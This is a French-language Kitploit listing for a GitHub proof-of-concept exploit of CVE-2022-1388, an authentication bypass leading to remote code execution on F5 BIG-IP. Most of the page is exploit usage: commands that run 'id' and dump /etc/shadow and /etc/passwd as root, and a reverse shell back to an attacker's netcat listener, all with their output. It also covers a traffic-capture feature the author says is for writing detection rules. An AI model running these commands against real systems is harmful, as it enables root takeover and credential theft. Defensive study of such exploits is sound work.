Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-1388 — -- POUR USAGE ÉDUCATIF UNIQUEMENT -- Preuve de concept RCE pour CVE-2022-1388, plus quelques fonctionnalités ajoutées pour les blue et red teams. | Kitploit
Outils/GitHubGitHub/vaelwolf/cve-2022-1388
Sniffing et Analyse de PaquetsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebAnalyse ForensiqueTests d'IntrusionApprentissage et Éducation
GitHubvaelwolf/cve-2022-1388

CVE-2022-1388

-- POUR USAGE ÉDUCATIF UNIQUEMENT -- Preuve de concept RCE pour CVE-2022-1388, plus quelques fonctionnalités ajoutées pour les blue et red teams.

Voir le dépôt
71il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-1388 RCE, Reverse Shell, et Exportation Automatique de PCAP

-- POUR USAGE ÉDUCATIF UNIQUEMENT --

L'auteur n'est pas responsable et ne peut être tenu pour responsable de toute action entreprise avec quelque aspect que ce soit de ce projet/dépôt. J'ai créé cela dans le but de comprendre l'attaque ainsi que d'écrire des détections dans un SIEM, et j'ai voulu le partager pour que d'autres puissent faire de même. Utilisation à vos propres risques.

Cet exploit cible la vulnérabilité REST iControl BIG-IP CVE-2022-1388 dans les systèmes F5. Veuillez consulter l'avis F5 (https://support.f5.com/csp/article/K23605346) pour les versions concernées et d'autres informations.

N'hésitez pas à proposer une PR ou à signaler tout problème. Ceci a été testé sur quelques F5 VE vulnérables dans Google Cloud à partir d'une machine CentOS avec Python 3.6.

Utilisation

root@kitploit:~
CVE-2022-1388.py [-h] -t TARGET -p PORT [-c CMD] [-s] [-e] [-lh LHOST] [-lp LPORT]

optional arguments:
  -h, --help            show this help message and exit
  
  -t TARGET, --target TARGET, --RHOSTS TARGET
                        Target IP of vulnerable BIG-IP system
  -p PORT, --port PORT, --RPORT PORT
                        Target port on vulnerable BIG-IP system
  -c CMD, --cmd CMD, --command CMD
                        Command to run on target system
  -e, --export, --tcpdump
                        Export captured traffic and ssl-key.log | **Requires sudo privileges!
  -q, --quiet           Don't display banner
  -s, --shell           Launch an interactive shell
  -lh LHOST, --lhost LHOST, --LHOST LHOST
                        Required for -s [shell]; Local IP/interface to bind listener to
  -lp LPORT, --lport LPORT, --LPORT LPORT
                        Required for -s [shell]; Local port to bind listener to

Exécution de code à distance

root@kitploit:~
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c id

===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
       Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
=============================================================================================================== 


uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
root@kitploit:~
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/shadow" -q
root:!!:18656:0:99999:7:::
bin:*:16479:0:99999:7:::
daemon:*:16479:0:99999:7:::
adm:*:16479:0:99999:7:::
lp:*:16479:0:99999:7:::
mail:*:16479:0:99999:7:::
uucp:*:16479:0:99999:7:::
[[ removed for brevity ]]

Reverse shell

root@kitploit:~
Attacker:
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -s -lh 10.142.0.8 -lp 4444

===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
        Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
=============================================================================================================== 


[+] If you haven't already, please start your listener of choice on port 4444
[+] Press any key to continue...

[+] Exploit finished. If you launched a reverse shell listener, check there for your terminal!
 
Listener:
$ nc -lp 4444
bash: no job control in this shell
[@localhost:Active:Standalone] restjavad # whoami
whoami
root

Exportation d'un PCAP pour analyse

Spécifier le drapeau -e (--export) créera deux fichiers : detection.pcap et ssl-key.log. Ces fichiers seront écrasés à chaque fois que le drapeau -e est spécifié, alors pensez à déplacer ou renommer les fichiers que vous souhaitez conserver. Le fichier ssl-key.log peut être importé dans Wireshark via Préférences -> Protocoles -> TLS -> nom de fichier du journal de clés (Master)-Secret pour déchiffrer la session TLS. Notez qu'en raison de tcpdump, lors de l'utilisation de -e, le script doit être exécuté en sudo.

root@kitploit:~
$ sudo python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/passwd" -q -e
[+] Starting tcpdump on port 8443 for 5 seconds

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
[[ removed for brevity ]]

Avant le déchiffrement TLS :

Wireshark 01

Ajout du fichier ssl-key.log exporté automatiquement dans les préférences TLS de Wireshark :

Wireshark Preferences

Après le déchiffrement TLS :

Wireshark 02 Wireshark 03
Télécharger l’outil